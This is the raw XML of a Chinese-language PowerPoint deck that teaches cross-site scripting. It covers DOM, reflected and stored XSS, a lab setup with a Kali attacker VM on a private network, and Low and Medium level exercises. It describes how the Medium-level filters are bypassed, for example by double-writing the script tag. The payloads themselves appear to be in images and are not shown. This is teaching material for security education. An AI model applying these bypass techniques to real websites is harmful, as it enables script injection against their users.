              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system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4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>型：特殊的反射型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>。当页面到达浏览器时，浏览器会为页面创建</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>Document Object</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>文档对象，若攻击者发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>型</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>漏洞，可以在客户端获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:latin typeface="-apple-system"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>中数据并在本地执行，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可以达到绕过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WAF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、躲避服务端检测的效果。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400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33882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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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二、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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类型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61BC245-A79C-6E46-F192-393CB9047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63" y="1453710"/>
            <a:ext cx="5292263" cy="410861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E80C899-35F9-4F44-4550-6D868DC37A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8" t="1305" b="2069"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5671726" y="1453709"/>
            <a:ext cx="5589291" cy="410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41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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="1546502"/>
            <a:ext cx="1012202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实验设备：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400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sz="800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服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>Windows XP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>虚拟机） </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>192.168.77.132</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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客户端（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400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Windows 11 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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物理机） </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400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192.168.77.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="800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攻击者（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400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Kali 2022.4   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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虚拟机）  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400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192.168.77.130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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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45407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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-Low</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="1566952"/>
            <a:ext cx="10122026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Low</a:t>
            </a:r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级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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PHP</a:t>
            </a:r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源码基本没有做防护，根据下述注入可以发现存在漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400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sz="1200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Low_DOM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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Low_Reflected:</a:t>
            </a:r>
          </a:p>
          <a:p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Low_Stored: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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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294B60-95A9-66C3-464A-042B986BE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695" y="2504207"/>
            <a:ext cx="8380998" cy="373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4F424E-F5C0-DDE1-65FC-405E92086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848" y="3387943"/>
            <a:ext cx="5835304" cy="3076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A1F260A-F058-1CCF-9BA4-58031456F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848" y="4205522"/>
            <a:ext cx="6127996" cy="32307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F6F246C-5259-A03A-4779-6CA0CBE9CC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092" y="4717097"/>
            <a:ext cx="5009384" cy="15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13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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="1566952"/>
            <a:ext cx="10122026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Medium</a:t>
            </a:r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级别</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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PHP</a:t>
            </a:r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源码做了一定加固</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400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：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400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sz="1200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r>
              <a:rPr lang="en-US" altLang="zh-CN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Medium_DOM: </a:t>
            </a:r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若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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default</a:t>
            </a:r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内容非空，且存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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”&lt;script”</a:t>
            </a:r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，将网页重定向到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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”?=default=English”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使用之前的脚本即可绕过：</a:t>
            </a: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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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sz="2400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0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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D48951-2414-4F64-88C2-608415783B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9"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="844061" y="2602810"/>
            <a:ext cx="5400432" cy="19267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B03F5E8-9D02-16AB-B361-61BC19EBA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63" y="5089576"/>
            <a:ext cx="8380998" cy="3738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7C68FE2-A177-6277-8278-40F141BD03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7186" y="3429000"/>
            <a:ext cx="4549534" cy="145554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A5D5482-7B08-058E-2E51-63974BFB06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8091" y="2747315"/>
            <a:ext cx="1699407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87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39D860F-CDB8-412F-1BD2-0993B4EE50ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="633184"/>
            <a:ext cx="6792326" cy="10358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三、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US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靶场练习</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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-Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200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级别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DE946F-CB3E-4FC9-F7C6-6A0F86D78792}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="760463" y="1486136"/>
            <a:ext cx="1012202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Medium_Reflected: </a:t>
            </a:r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若</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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default</a:t>
            </a:r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非空，如果有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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”&lt;script&gt;”</a:t>
            </a:r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替换成空</a:t>
            </a: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sz="800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r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="292C32"/>
                </a:solidFill>
                <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
              </a:rPr>
              <a:t>通过复写即可绕过：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/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sz="2400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sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="字魂59号-创粗黑" panose="00000500000000000000"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="292C32"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Open Sans" panose="020B0606030504020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="字魂59号-创粗黑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BD2EC5-4FEF-1D8A-A807-1F9A21D1F4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569"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="891704" y="1945315"/>
            <a:ext cx="5281297" cy="2049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88EBD05-37F3-6A36-66CF-C62F47717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63" y="4555241"/>
            <a:ext cx="7361266" cy="3168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C3FD603-3CCF-5FA6-D441-1E2D3ADE48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472" y="2920996"/>
            <a:ext cx="4595258" cy="14250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15B0645-8BD8-9C30-6865-48529BC43C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9460" y="1946181"/>
            <a:ext cx="3444538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06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,&quot;SettingType&quot;:&quot;System&quot;}"/>
  <p:tag name="ISPRING_PRESENTATION_TITLE" val="陕西师范大学毕业答辩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35f8ada8-d1d5-484b-a646-0693bbf3215b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</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Office 主题​​">
  <a:themeElements>
    <a:clrScheme name="民大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7010E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="CC4226"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="2B948C"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="3B5DCC"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FCDE99"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="5C448A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931</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>202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-apple-system</vt:lpstr>
      <vt:lpstr>Bebas</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>字魂59号-创粗黑</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Open Sans</vt:lpstr>
      <vt:lpstr>Office 主题​​</vt:lpstr>
      <vt:lpstr>自定义设计方案</vt:lpstr>
      <vt:lpstr>跨站脚本攻击XSS介绍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感谢您的观看与倾听！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陕西师范大学毕业答辩PPT模板</dc:title>
  <dc:creator>.</dc:creator>
  <cp:lastModifiedBy>CSD SJTU</cp:lastModifiedBy>
  <cp:revision>240</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-12-13T16:13:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-19T07:59:53Z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